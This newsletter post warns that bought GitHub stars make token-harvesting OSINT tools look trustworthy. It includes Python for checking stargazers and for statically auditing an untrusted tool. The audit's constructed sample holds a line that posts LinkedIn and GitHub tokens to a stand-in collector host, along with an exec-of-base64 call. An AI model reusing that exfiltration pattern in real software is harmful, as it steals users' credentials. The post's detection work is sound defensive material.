Welcome to the 2nd issue of OSINT Pros. This post is technical: it is about the risks of trusting an open-source project on GitHub based on the number of stars it has.
🤔Think for A Minute
Pause for a minute and let your mind relax. Now imagine you are scrolling Twitter for updates and you come across a post with the following announcement:
“Announcing my new project, Email2Info, an open-source tool that accepts an email as input and finds accounts associated with that email. It has 50+ modules and I am actively adding more. Give it a try at link.“
You are excited. You open the link and see it has 1.2k+ stars, so it must be genuine. You install it locally and run it on your Linux machine. It asks for sudo, and in your excitement you grant it (a tool that only queries web APIs has no reason to need root; that alone should give you pause). It installs successfully. You run it and it shows an error: “Some tokens are missing. We need tokens for Instagram, Twitter, GitHub, etc. to fetch detailed info about the user. Here’s how to get these tokens step by step. Link“
Still excited, you follow the steps and hand over the tokens. You run it again, but now it shows a different error. Do you know why?
Problem
Here’s why it won’t work: it was never meant to. Some open-source projects exist only to harvest tokens. Let me give you another example.
Last year, when we launched profiler.me, it had a tool, Basic Search, which accepted an email and returned data about the associated accounts on Google, LinkedIn, GitHub, Protonmail, Gravatar and a few more. To keep this tool working, I had to update the LinkedIn token every 12 hours. (I updated tokens for the other platforms too at regular intervals, but that’s not the point.)
It was very boring; I hated it. Also, I was pulling the token from my own account again and again, which is risky. What if I wanted to make this smooth? I could just launch a new OSINT tool, email2linkedin, which gives you a LinkedIn account from just an email, but you need to bring your own token. If the project has 5-10 stars, you may not try it. But if it has 100+, I am sure 99% of people will give it a try: they will install it, supply the needed token and run it. Some such tools work and some don’t, depending on how evil the developer is, but either way the token gets shared with the developer of the tool one way or another. If I went this way, all my problems would be solved: instead of one token, I would be collecting many tokens from different accounts, so if one stops working, the next one gets used. Back to the main topic.
This has been going on for a long time, but it keeps getting easier. We decide whether a tool is good or bad, works or doesn’t work, based on the number of stars it has on GitHub. Here’s an interesting take on it:
- A peer-reviewed CMU study (ICSE 2026) found 6 million fake stars across 18,617 repositories using 301,000 accounts, with AI/LLM repos the largest non-malicious category
- Stars sell for $0.03 to $0.85 each on at least a dozen websites, Fiverr gigs and Telegram channels; no dark web required
- VCs explicitly use stars as sourcing signals: Redpoint found the median star count at seed is 2,850, and firms run automated scrapers to find fast-growing repos
- An independent analysis sampling 150 profiles per repo across 20 projects found repos where 36–76% of stargazers have zero followers and fork-to-star ratios 10x below organic baselines
- The FTC's 2024 rule banning fake social influence metrics carries penalties of $53,088 per violation, and the SEC has already charged startup founders for inflating traction metrics during fundraising.
In the scenario above, the fake stars were bought for a different purpose (fundraising signals), but I won’t be wrong in saying they are used for plenty of malicious reasons too, such as spreading malware and harvesting tokens.
If you want to read more on this topic, see GitHub Fake Stars Poison Open Source: 6M Stars for Sale.
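The two stargazer checks from the list above (share of zero-follower stargazers, fork-to-star ratio), plus an account-creation-burst check, implemented as an added example. This is not code from the article, from the CMU study or from any tool mentioned here. ORGANIC_FORK_RATIO is an assumed baseline, not a figure from the article, and the two samples at the bottom are constructed; the fetch_sample helper uses the real GitHub REST API endpoints but needs network access and, realistically, a token.

```python
"""
Stargazer-quality signals for a GitHub repository (added example, not the
article's or any project's code). The fork-ratio baseline is an assumption.
"""
import json
import urllib.request
from collections import namedtuple
from datetime import date, timedelta

Stargazer = namedtuple("Stargazer", "login followers created")

ORGANIC_FORK_RATIO = 0.10    # assumed: roughly 1 fork per 10 stars for a healthy repo
ZERO_FOLLOWER_ALERT = 0.36   # low end of the 36-76% range quoted in the article
BURST_ALERT = 0.50           # half the sample registered inside one week


def zero_follower_share(sample):
    return sum(1 for s in sample if s.followers == 0) / len(sample) if sample else 0.0


def fork_to_star_ratio(stars, forks):
    return forks / stars if stars else 0.0


def creation_burst(sample, window_days=7):
    """Largest fraction of sampled accounts registered within any window_days span.
    Star farms are usually registered in batches; organic stargazers are not."""
    dates = sorted(s.created for s in sample)
    best, j = 0, 0
    for i, d in enumerate(dates):          # sliding window over sorted dates
        while d - dates[j] > timedelta(days=window_days):
            j += 1
        best = max(best, i - j + 1)
    return best / len(dates) if dates else 0.0


def assess(sample, stars, forks):
    zf = zero_follower_share(sample)
    fr = fork_to_star_ratio(stars, forks)
    burst = creation_burst(sample)
    flags = []
    if zf >= ZERO_FOLLOWER_ALERT:
        flags.append("zero_follower_stargazers")
    if stars >= 100 and fr < ORGANIC_FORK_RATIO / 10:   # "10x below baseline"
        flags.append("fork_ratio_10x_below_baseline")
    if burst >= BURST_ALERT:
        flags.append("account_creation_burst")
    return {"zero_follower_share": zf, "fork_to_star_ratio": fr,
            "creation_burst": burst, "flags": flags}


def fetch_sample(owner, repo, token=None, n=50):
    """Pull n stargazers and their profiles from the GitHub REST API.
    Needs network; without a token the unauthenticated rate limit bites fast."""
    hdr = {"Accept": "application/vnd.github+json", "User-Agent": "star-audit"}
    if token:
        hdr["Authorization"] = "Bearer " + token

    def get(url):
        with urllib.request.urlopen(urllib.request.Request(url, headers=hdr)) as r:
            return json.load(r)

    meta = get(f"https://api.github.com/repos/{owner}/{repo}")
    gazers = get(f"https://api.github.com/repos/{owner}/{repo}/stargazers?per_page={n}")
    sample = []
    for g in gazers:                       # stargazer list has no follower counts
        u = get(f"https://api.github.com/users/{g['login']}")
        sample.append(Stargazer(u["login"], u["followers"],
                                date.fromisoformat(u["created_at"][:10])))
    return sample, meta["stargazers_count"], meta["forks_count"]


# Constructed samples, 20 stargazers each; no real accounts.
def farm_sample():
    batch = date(2025, 3, 3)
    bots = [Stargazer(f"u{i:05d}", 0, batch + timedelta(days=i % 5)) for i in range(15)]
    humans = [Stargazer(f"dev{i}", 40 + 10 * i, date(2019, 1, 1) + timedelta(days=200 * i))
              for i in range(5)]
    return bots + humans


def organic_sample():
    return [Stargazer(f"eng{i}", 5 + 7 * i, date(2016, 1, 1) + timedelta(days=120 * i))
            for i in range(20)]


if __name__ == "__main__":
    print("suspect :", assess(farm_sample(), stars=1200, forks=3))
    print("organic :", assess(organic_sample(), stars=1200, forks=150))
```

Sample the most recent stargazer pages rather than the first one: bought stars land in bursts, so the tail of the list is where a farm shows up. A clean result is not proof of anything; it only tells you the cheapest kind of fraud is absent.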
📝📝My Take
Note - Gitpod.io pivoted at the end of last year, so it is a different product now; don’t waste your time trying it out. I will find an alternative and mention it soon.
This is not something new. I have been aware of it for a very long time. When I started my journey in learning cybersecurity, I came across this topic right at that time. I used to use an online website, gitpod.io, which gives you a virtual terminal and IDE running in the cloud. It had a free tier, which was more than enough for me. I used it for running any CLI-based tool so that, in case it contained malware or something similar, it didn’t affect me. Apart from this, I used Kali Linux in VirtualBox, which was used only for testing and learning. It contains nothing except this stuff, so there is nothing to lose in case something goes wrong; I just delete that instance and install a fresh Kali Linux machine. One more solution: instead of stars, pay attention to the number of forks, search for the name of the project and see how many times it has been mentioned and by whom. If a tool hasn’t been mentioned by any trusted source, I usually don’t trust it. Beyond that, you can read the code if you understand the language it has been written in. But it can also be obfuscated, so you can’t say anything for sure. It’s a cat and mouse game.
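Before handing a tool like the email2linkedin thought experiment above any token, the two questions worth answering from its source are where it sends data and how it gets at your secrets; the paragraph above also notes that obfuscation defeats casual reading. Below is an added example that walks the Python AST of a checkout to answer both and to point at the usual obfuscation sinks. It is not the article's code nor any tool's; EXPECTED_HOSTS is an assumed allowlist for a tool that claims to query LinkedIn only, and SAMPLE_TOOL is a constructed source file (the collector.example.net host does not exist).

```python
"""
Static triage of an untrusted Python tool before giving it an API token
(added example; the allowlist and the sample source are assumptions).
"""
import ast
import pathlib
import re
from urllib.parse import urlparse

EXPECTED_HOSTS = {"api.linkedin.com", "www.linkedin.com"}   # assumed allowlist
URL_RE = re.compile(r"https?://[^\s\"'<>]+")
SECRET_ENV_RE = re.compile(r"(TOKEN|SECRET|KEY|COOKIE|PASSWORD)", re.I)
DYNAMIC_CODE = {"exec", "eval", "compile", "__import__"}
DECODERS = {"base64.b64decode", "codecs.decode", "zlib.decompress"}


def _call_name(node):
    """Dotted name of a call target, e.g. 'requests.post' or 'os.getenv'."""
    parts, f = [], node.func
    while isinstance(f, ast.Attribute):
        parts.append(f.attr)
        f = f.value
    if isinstance(f, ast.Name):
        parts.append(f.id)
    return ".".join(reversed(parts))


def audit_source(src):
    report = {"hosts": set(), "env_reads": set(), "dynamic_code": [], "decoders": []}
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            for url in URL_RE.findall(node.value):            # literal URLs anywhere
                report["hosts"].add(urlparse(url).hostname)
        elif isinstance(node, ast.Call):
            name = _call_name(node)
            if name in ("os.getenv", "os.environ.get") and node.args \
                    and isinstance(node.args[0], ast.Constant):
                report["env_reads"].add(node.args[0].value)
            elif name.split(".")[-1] in DYNAMIC_CODE:
                report["dynamic_code"].append((name, node.lineno))
            elif name in DECODERS:
                report["decoders"].append((name, node.lineno))
        elif isinstance(node, ast.Subscript):                 # os.environ["X"]
            v = node.value
            if (isinstance(v, ast.Attribute) and v.attr == "environ"
                    and isinstance(v.value, ast.Name) and v.value.id == "os"
                    and isinstance(node.slice, ast.Constant)):
                report["env_reads"].add(node.slice.value)
    report["unexpected_hosts"] = report["hosts"] - EXPECTED_HOSTS
    report["secret_env"] = {e for e in report["env_reads"] if SECRET_ENV_RE.search(e)}
    return report


def findings(report):
    """Human-readable verdict lines; empty list means nothing obvious was found."""
    out = []
    if report["unexpected_hosts"]:
        out.append("traffic to hosts outside the claimed platforms: "
                   + ", ".join(sorted(report["unexpected_hosts"])))
    if report["secret_env"] and report["unexpected_hosts"]:
        out.append("reads " + ", ".join(sorted(report["secret_env"]))
                   + " and has an unexplained egress host: treat as token harvesting")
    for name, ln in report["dynamic_code"]:
        out.append(f"dynamic code execution via {name}() at line {ln}")
    for name, ln in report["decoders"]:
        out.append(f"decoder {name}() at line {ln}: payload may be obfuscated, inspect it")
    return out


def audit_tree(root):
    """Audit every .py file under a checkout; returns {path: findings}."""
    return {str(p): findings(audit_source(p.read_text(errors="replace")))
            for p in pathlib.Path(root).rglob("*.py")}


# Constructed source of a hypothetical email2linkedin tool (not a real project).
SAMPLE_TOOL = '''
import os, base64, requests

LINKEDIN_TOKEN = os.environ["LINKEDIN_TOKEN"]
GH = os.getenv("GITHUB_TOKEN")

def lookup(email):
    r = requests.get("https://api.linkedin.com/v2/people",
                     headers={"Authorization": LINKEDIN_TOKEN}, params={"email": email})
    # the harvesting step from the newsletter's scenario, constructed here
    requests.post("https://collector.example.net/ingest", json={"t": LINKEDIN_TOKEN, "g": GH})
    return r.json()

exec(base64.b64decode("cHJpbnQoJ2hpJyk=").decode())
'''

if __name__ == "__main__":
    for line in findings(audit_source(SAMPLE_TOOL)):
        print("-", line)
```

Point audit_tree at the clone and read every line it prints; then remember what it cannot see: URLs assembled at runtime, hosts fetched from a config file, or a native extension doing the network call. That is exactly why the throwaway VM still matters, ideally with outbound traffic logged so you can compare the hosts the tool actually talks to against the ones it claims to need.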
⏳Need for feedback
Guys, your feedback matters a lot to me. Feedback is what helps me understand whether I am writing on topics you are interested in or just writing for myself. It also helps me understand what can be improved: is it the writing style, the use of graphics, or something else? Please leave a comment on every post, positive or negative, it doesn’t matter. It will take just a minute of your time, but it gives me the motivation to create more and better content.
🎉🎉About the Newsletter
Our club now has 7 people. Thanks to
Today I was chatting with someone on LinkedIn and I got the following response:

At that time, I didn’t know what the most appropriate answer would be. But now, while writing this post, I realized what’s different. Perspective! You can get updates about OSINT from lots of sources. Anyone can do curation; I used to do it too, and it’s very easy. I want to focus on helping my readers gain a new perspective on everything they do, mostly on OSINT, but I will be writing a few posts on other useful topics too.
I don’t want to be part of the crowd copy-pasting the same stuff from here and there. I was part of that crowd until last year. This year I decided to change myself, and now I am getting awesome results. I am very interested in writing a post on “How I changed my habits and perspective within three months“, including some real stories, scientific techniques and the resources I used. Comment “Perspective“ if you want this to be the next post. Otherwise, the next post will be on Username OSINT, as mentioned in the last post.
Have a Good Day.